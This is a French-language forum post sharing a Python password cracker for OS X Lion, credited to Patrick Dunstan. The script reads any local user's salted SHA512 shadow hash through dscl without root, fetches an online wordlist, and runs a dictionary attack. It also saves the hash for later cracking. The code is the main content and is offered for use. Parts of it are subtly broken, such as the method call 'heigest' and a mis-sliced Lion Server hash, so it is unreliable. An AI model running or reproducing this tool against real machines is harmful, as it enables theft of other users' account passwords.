Annonce

Réduire
Aucune annonce.

[Mac OS X] [python] OS X Lion Password Cracker

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Mac OS X] [python] OS X Lion Password Cracker

    Unhash SHA512 + 4-byte salt


    Code:
    ##########################################
    #* OS X Lion 10.7 Password Cracker
    #* UID 0 NOT required
    #*
    #* Usage:
    #* python lion_crack.py [username] [dictionnary]
    #*
    ###########################################
    from subprocess import *
    import hashlib
    import os
    import urllib2
    import sys
    from string import *
    
    link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
    defaultuser = False
    username = ""
    
    def check(password): # Hash password and compare
    		
    	if not password.startswith("#!"): # Ignore comments
    
    		guess = hashlib.sha512(salt_hex + password).heigest()
    		print("Trying... " + password)
    	
    		if guess == hash:
    			print("Cleartext password for user '"+username+"' is : "+password)
    			exit(0)
    
    if len(sys.argv) < 2:
    	print("No username given. Defaulting to current user.")
    	defaultuser = True
    else:
    	username = sys.argv[1]
    
    p = Popen("whoami", shell=True, stdout=PIPE)
    whoami = p.communicate()[0]
    
    if defaultuser:
    	username = whoami.rstrip()
    
    p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
    dscl_out = p.communicate()[0]
    
    list = dscl_out.split("\n")
    
    for pos,item in enumerate(list): # extract digest
    	if "dsAttrTypeNative:ShadowHashData" in item:
    		digest = list[pos+1].replace(" ", "")
    
    if len(digest) == 262: # Out of box configuration	
    	salt = digest[56:64]	
    	hash = digest[64:192]
    elif len(digest) == 314: # SMB turned on
    	print("SMB is on")
    	salt = digest[104:112]
    	hash = digest[112:240]
    elif len(digest) == 1436: # Lion Server
    	salt = digest[176:184]
    	hash = digest[176:304]
    elif len(digest) == 1492: # Lion Server with SMB
    	salt = digest[224:232]
    	hash = digest[232:360]
    
    print("SALT : " + salt)
    print("HASH : " + hash)
    
    salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16))
    
    if len(sys.argv) == 3: # If dictionary file specified
            print("Reading from dictionary file '"+sys.argv[2]+"'.")
            check(whoami.rstrip())
    	passlist = open(sys.argv[2], "r")
            password = passlist.readline()
     
            while password:
                    check(password.rstrip())
                    password = passlist.readline()
            passlist.close()
     
    else: # No dictionary file specified
            print("No dictionary file specified. Defaulting to hard coded link.")
            
    	passlist = urllib2.urlopen(link) # Download dictionary file
            passwords = passlist.read().split("\n")
    	print("\nPassword list successfully read")
    	
    	passwords.append(whoami.rstrip())	
     	
    	print("\nCracking...")
            for password in passwords:
                    check(password)
    
    # Save hash for later
    print("\nSaving hash to "+username+".hash...")
    out = open(username+".hash", "w")
    out.write(salt+hash)
    out.close()
    
    print("\nPassword not found. Try another dictionary.\n")
    credit: patrick dunstan
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|
Chargement...
X